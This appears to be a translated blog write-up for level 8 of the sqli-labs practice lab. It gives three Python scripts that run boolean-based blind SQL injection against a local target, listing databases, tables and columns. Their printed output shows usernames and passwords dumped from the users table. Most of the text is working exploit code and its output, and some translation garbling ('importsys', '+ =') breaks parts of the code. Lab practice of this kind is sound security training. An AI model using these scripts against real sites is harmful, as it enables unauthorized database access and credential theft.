The following is the python script for the eighth level of sql-labs
Alas, it took a long time to debug
Python’s loops do not have {}, so when writing, you must pay attention to which one is nested, and the indentation must be done correctly without making mistakes. Otherwise, even if no error is reported, the running result will be wrong (╬▔ Pan▔)╯
import requests header = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0', 'Accept-Language': 'zh-CN,zh;q=0.9', 'Accept': 'text/html,application/xhtml + xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' } database_length = 0 database_name = '' table_counts = 0 table_length = 0 table_name = '' column_counts = 0 column_length = 0 column_name = '' information_counts = 0 information_length = 0 information_name = '' base_url = "http://127.0.0.1/sql-labs/Less-8/?id=1'" # Database length for i in range(1, 50): payload = f' and length(database())={i} -- + ' new_url = base_url + payload response = requests.get(new_url, headers=header) if 'You are in..........' in response.text: database_length = i break # Name database for i in range(1, database_length + 1): for m in range(65, 123): payload = f' and substr(database(),{i},1)='{chr(m)}' -- + ' new_url = base_url + payload response = requests.get(new_url, headers=header) if 'You' in response.text: database_name = database_name + chr(m) break #Number of tables for i in range(1, 100): payload = f' and (select count(table_name) from information_schema.tables where table_schema='security')={i} -- + ' new_url = base_url + payload response = requests.get(new_url, headers=header) if 'You are in..........' in response.text: table_counts = i break #The length and name of the table for i in range(1, table_counts + 1): table_name = '' for m in range(1, 50): payload = f' and length((select table_name from information_schema.tables where table_schema='security' limit {i},1))={m} -- + ' new_url = base_url + payload response = requests.get(new_url, headers=header) if 'You are in..........' in response.text: table_length = m break for m in range(1, table_length + 1): for n in range(65, 123): payload = f' and substr((select table_name from information_schema.tables where table_schema='security' limit {i},1),{m},1)='{chr(n)}' -- + ' new_url = base_url + payload response = requests.get(new_url, headers=header) if 'You are in..........' in response.text: table_name = table_name + chr(n) break print(f'The name of table {i} is: ' + table_name.lower()) for a in range(1, 100): payload = f' and (select count(column_name) from information_schema.columns where table_name='{table_name.lower()}' and table_schema='security')={a} -- + ' new_url = base_url + payload response = requests.get(new_url, headers=header) if 'You are in..........' in response.text: column_counts = a break #The length name of each column for b in range(1, column_counts + 1): column_name = '' for c in range(1, 50): payload = f' and length((select column_name from information_schema.columns where table_name='{table_name.lower()}' and table_schema='security' limit {b},1))={c} -- + ' new_url = base_url + payload response = requests.get(new_url, headers=header) if 'You are in..........' in response.text: column_length = c break for m in range(1, column_length + 1): for n in range(65, 123): payload = f' and substr((select column_name from information_schema.columns where table_name='{table_name.lower()}' and table_schema='security' limit {b},1),{m},1)='{chr (n)}' -- + ' new_url = base_url + payload response = requests.get(new_url, headers=header) if 'You are in..........' in response.text: column_name = column_name + chr(n) break print(f'The name of column {b} is: ' + column_name.lower()) #The number, length, and name of the data under the column for x in range(0, 100): payload = f' and (select count({column_name.lower()}) from {table_name.lower()})={x} -- + ' new_url = base_url + payload response = requests.get(new_url, headers=header) if 'You are in..........' in response.text: information_counts = x break for y in range(1, information_counts + 1): information_name = '' for z in range(1, 50): payload = f' and length((select {column_name.lower()} from {table_name.lower()} limit {y},1))={z} -- + ' new_url = base_url + payload response = requests.get(new_url, headers=header) if 'You are in..........' in response.text: information_length = z break for j in range(1, information_length + 1): for k in range(65, 123): payload = f' and substr((select {column_name.lower()} from {table_name.lower()} limit {y},1),{j},1)='{chr(k)}' -- + ' new_url = base_url + payload response = requests.get(new_url, headers=header) if 'You are in..........' in response.text: information_name = information_name + chr(k) break print(f'The name of data {y} is: ' + information_name.lower()) print('The database name is: ' + database_name) print('The number of tables in this database is:' + str(table_counts))
operation result
E:\python\python.exe "D:\python\test1\aql-labs\less-8 three.py" The name of Table 1 is: referers The name of column 1 is: referer The name of column 2 is: ip_address Column 3 is named: The name of Table 2 is: uagents The name of column 1 is: uagent The name of column 2 is: ip_address The name of column 3 is: username Column 4 is named: The name of Table 3 is: users The name of column 1 is: username The name of data 1 is: angelina The name of data 2 is: dummy The name of data 3 is: secure The name of data 4 is: stupid The name of data 5 is: superman The name of data 6 is: batman The name of data 7 is: admin The name of data 8 is: admin The name of data 9 is: admin The name of data 10 is: admin The name of data 11 is: dhakkan The name of data 12 is: admin The name of data 13 is: The name of column 2 is: password The name of data 1 is: ikillyou The name of data 2 is: pssword The name of data 3 is: crappy The name of data 4 is: stupidity The name of data 5 is: genius The name of data 6 is: moble The name of data 7 is: admin The name of data 8 is: admin The name of data 9 is: admin The name of data 10 is: admin The name of data 11 is: dumbo The name of data 12 is: admin The name of data 13 is: Column 3 is named: The name of data 1 is: The name of data 2 is: The name of data 3 is:
When you first learn to write, it may not be good.
I also saw a code that was much better than mine
# 1. Set global variables DIS and list to control the display of detailed information and define the ASCII codes that need to be blasted # 2. Explode the current database length # 3. Define the database length blasting function Brute_length() # 4. Explode the current database name # 5. Define the database name blasting function Brute_database() # 6. Explode all database lengths # 7. Explode all database names # 8. Explosion table name # 9. Define the table name blasting function Brute_table() # 10. Explode field names # 11. Define field blasting function Brute_column() # 12. Blasting data # 13. Define the data blasting function data_dump() import requests import time importsys # 1. Set global variables DIS and list to control the display of detailed information and define the ASCII codes that need to be blasted. DIS=True list = [44, 46, 95, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58] for i in range(97, 123): list.append(i) for i in range(64, 91): list.append(i) for i in range(33, 76): list.append(i) def sql_Inject(url, flag, display): global DIS DIS=display # 2. Explode the current database length current_length = Brute_length(url, flag, current=True) print("Current database length:", current_length) # 4. Explode the current database name current_database_name = Brute_database(url, current_length, flag, current=True) print("Current database name:", current_database_name) # 6. Explode all database lengths length = Brute_length(url, flag) print("Database full length:", length) # 7. Explode all database names all_databases = input("Brute all the databases?[yes/no]: ") if all_databases == 'yes': database_name = Brute_database(url, length, flag) print("Database name:", database_name) # 8. Explosion table name while True: choose_database = input("choose the database: ") table_name = Brute_table(url, choose_database, flag) print("Database: %s" % choose_database) print("Table: %s" % table_name) print('') next = input("continue brute the tables?[yes/no]: ") if next == "no": break # 10. Explode field names while True: choose_database = input("choose the database: ") choose_table = input("choose the table: ") column_name = Brute_column(url, choose_database, choose_table, flag) print("Table: %s.%s" % (choose_database, choose_table)) print("Field: %s" % column_name) print('') next = input("continue brute the columns?[yes/no]: ") if next == "no": break # 12. Blasting data while True: choose_database = input("choose the database: ") choose_table = input("choose the table: ") choose_column = input("choose the column: ") data = data_dump(url, choose_database, choose_table, choose_column, flag) print("Field: %s.%s.%s" % (choose_database, choose_table, choose_column)) print("data: %s" % data) print('') next = input("continue dump the data?[yes/no]: ") if next == "no": break # 13. Define the data blasting function data_dump() def data_dump(url, database, table, column, flag): raw_url = url length=1 jump=10 data = "" # First determine the data length while True: # url: http://127.0.0.1/sql-labs/Less-8/?id=1' and length((select group_concat(id) from security.emails))>10 -- + url = raw_url + "' and length((select group_concat(%s) from %s.%s))>%d -- + " % (column, database, table, jump) response = requests.get(url) if DIS: print(url) if flag in response.content: jump + = 10 else: jump -= 10 break while True: # url: http://127.0.0.1/sql-labs/Less-8/?id=1' and length((select group_concat(id) from security.emails))>11 -- + url = raw_url + "' and length((select group_concat(%s) from %s.%s))>%d -- + " % (column, database, table, jump + length) if DIS: print(url) response = requests.get(url) if flag in response.content: length + = 1 else: break data_length = length + jump # Explosion data for i in range(data_length): for ASCII in list: # url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and ord(substr((select group_concat(id) from security.emails),1,1))='44' -- + url = raw_url + "' and ord(substr((select group_concat(%s) from %s.%s),%d,1))=%d -- + " % (column, database, table, i + 1 , ASCII) if DIS: print(url) response = requests.get(url) if flag in response.content: data + = chr(ASCII) break # time.sleep(5) return data # 11. Define field blasting function Brute_column() def Brute_column(url, database, table, flag): raw_url = url length=1 jump=10 column_name = "" # First determine the field length while True: # url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='emails') )>10 -- + url = raw_url + "' and length((select group_concat(column_name) from information_schema.columns where table_schema='%s' and table_name='%s'))>%d -- + " % (database, table, jump) response = requests.get(url) if DIS: print(url) if flag in response.content: jump + = 10 else: jump -= 10 break while True: # url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema="security"))>11 -- + url = raw_url + "' and length((select group_concat(column_name) from information_schema.columns where table_schema='%s' and table_name='%s'))>%d -- + " % (database, table, jump + length) if DIS: print(url) response = requests.get(url) if flag in response.content: length + = 1 else: break column_length = length + jump # Explode field name for i in range(column_length): for ASCII in list: # url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and ord(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='emails '),1,1))='44'-- + url = raw_url + "' and ord(substr((select group_concat(column_name) from information_schema.columns where table_schema='%s' and table_name='%s'),%d,1))=%d -- + " % (database, table, i + 1, ASCII) if DIS: print(url) response = requests.get(url) if flag in response.content: column_name + = chr(ASCII) break # time.sleep(5) return column_name # 9. Define the table name blasting function Brute_table() def Brute_table(url, database, flag): raw_url = url length=1 jump=10 table_name = "" # First determine the length of the table name while True: # url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema="security"))>10 -- + url = raw_url + "' and length((select group_concat(table_name) from information_schema.tables where table_schema='%s'))>%d -- + " % (database, jump) response = requests.get(url) if DIS: print(url) if flag in response.content: jump + = 10 else: jump -= 10 break while True: # url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema="security"))>11 -- + url = raw_url + "' and length((select group_concat(table_name) from information_schema.tables where table_schema='%s'))>%d -- + " % (database, jump + length) if DIS: print(url) response = requests.get(url) if flag in response.content: length + = 1 else: break table_length = length + jump # Explosion table name for i in range(table_length): for ASCII in list: # url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and ord(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1 ))='44'-- + url = raw_url + "' and ord(substr((select group_concat(table_name) from information_schema.tables where table_schema='%s'),%d,1))=%d -- + " % (database, i + 1 , ASCII) if DIS: print(url) response = requests.get(url) if flag in response.content: table_name + = chr(ASCII) break # time.sleep(5) return table_name # 5. Define the database name blasting function Brute_database() def Brute_database(url, length, flag, current=False): raw_url = url database_name = "" # 2. Explode the current database name if current: for i in range(length): for ASCII in range(97, 123): # url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and ord(substr(database(),1,1))=97 -- + url = raw_url + "' and ord(substr(database(),%d,1))=%d -- + " % (i + 1, ASCII) if DIS: print(url) response = requests.get(url) if flag in response.content: database_name + = chr(ASCII) break # time.sleep(5) return database_name # Explode all database names # ' and ord(substr((select group_concat(schema_name) from information_schema.schemata),1,1))=97-- + else: for i in range(length): for ASCII in list: # url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and ord(substr((select group_concat(schema_name) from information_schema.schemata),1,1))=44-- + url = raw_url + "' and ord(substr((select group_concat(schema_name) from information_schema.schemata),%d,1))=%d -- + " % (i + 1, ASCII) if DIS: print(url) response = requests.get(url) if flag in response.content: database_name + = chr(ASCII) break # time.sleep(5) return database_name # 3. Define the database length blasting function Brute_length() def Brute_length(url, flag, current=False): length=1 raw_url = url jump=10 # Determine whether to blast the current database if current: while True: # url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length(database())>1 -- + url = raw_url + "' and length(database())>%d -- + " % length if DIS: print(url) response = requests.get(url) if flag in response.content: length + = 1 else: break return length # Explode all database lengths else: while True: # url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length((select group_concat(schema_name) from information_schema.schemata))>10 -- + url = raw_url + "' and length((select group_concat(schema_name) from information_schema.schemata))>%d -- + " % jump response = requests.get(url) if DIS: print(url) if flag in response.content: jump + = 10 else: jump -= 10 break while True: # url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length((select group_concat(schema_name) from information_schema.schemata))>1 -- + url = raw_url + "' and length((select group_concat(schema_name) from information_schema.schemata))>%d -- + " % (jump + length) if DIS: print(url) response = requests.get(url) if flag in response.content: length + = 1 else: break return (length + jump) if __name__ == "__main__": url = "http://127.0.0.1/sql-labs/Less-8/?id=1" flag = b'You are in...' display=False sql_Inject(url, flag, display)
operation result
E:\python\python.exe D:\python\test1\aql-labs\less-8.py Current database length: 8 Current database name: security Database full length: 67 Brute all the databases?[yes/no]: yes Database name: information_schema,challenges,mysql,performance_schema,security,sys choose the database: security Database:security Table: emails,referers,uagents,users continue brute the tables?[yes/no]: no choose the database: security choose the table: users Table: security.users Fields: id, username, password continue brute the columns?[yes/no]: no choose the database: security choose the table: users choose the column: username,password Fields: security.users.username,password Data: DumbDumb,AngelinaI-kill-you,Dummyp@ssword,securecrappy,stupidity,supermangenious,batmanmob!le,adminadmin,admin1admin1,admin2admin2,admin3admin3,dhakkandumbo,admin4admin4 continue dump the data?[yes/no]: no Process ended with exit code 0
This is obvious to others
However, these two types of code blasting are still a bit slow. You can use the dichotomy method
import requests def decide(): left = 0 right = 9 while left <= right: middle = (left + right) // 2 if 'You are in..........' in requests.request('get', f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(substr(length(length(database())), 1, 1)>{middle}, 1, 0 )-- + ").text: left = middle + 1 elif 'You are in...' in requests.request('get', f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(substr(length(length(database())), 1, 1)<{middle}, 1, 0 )-- + ").text: right=middle-1 else: return middle def ruler(size): left = 0 right = 9 i=1 length = '' while left <= right and i <= size: middle = (left + right) // 2 if 'You are in..........' in requests.request('get', f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(substr(length(database()), {i}, 1)>{middle}, 1, 0) -- + ").text: left = middle + 1 elif 'You are in...' in requests.request('get', f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(substr(length(database()), {i}, 1)<{middle}, 1, 0) -- + ").text: right=middle-1 else: i+=1 length + = str(middle) left = 0 right = 126 return int(length) def process(length): left = 32 right = 126 i=1 result = '' while left <= right and i <= length: middle = (left + right) // 2 if 'You are in..........' in requests.request('get', f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(ascii(substr(database(), {i}, 1))>{middle}, 1, 0) -- + ").text: left = middle + 1 elif 'You are in...' in requests.request('get', f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(ascii(substr(database(), {i}, 1))<{middle}, 1, 0) -- + ").text: right=middle-1 else: i+=1 result + = str(chr(middle)) left = 0 right = 126 print(result) return result if __name__ == '__main__': size = decide() length = ruler(size) result = process(length)
This is just a part of the code, the running results are as follows
sec secu secur securi securit security Process ended with exit code 0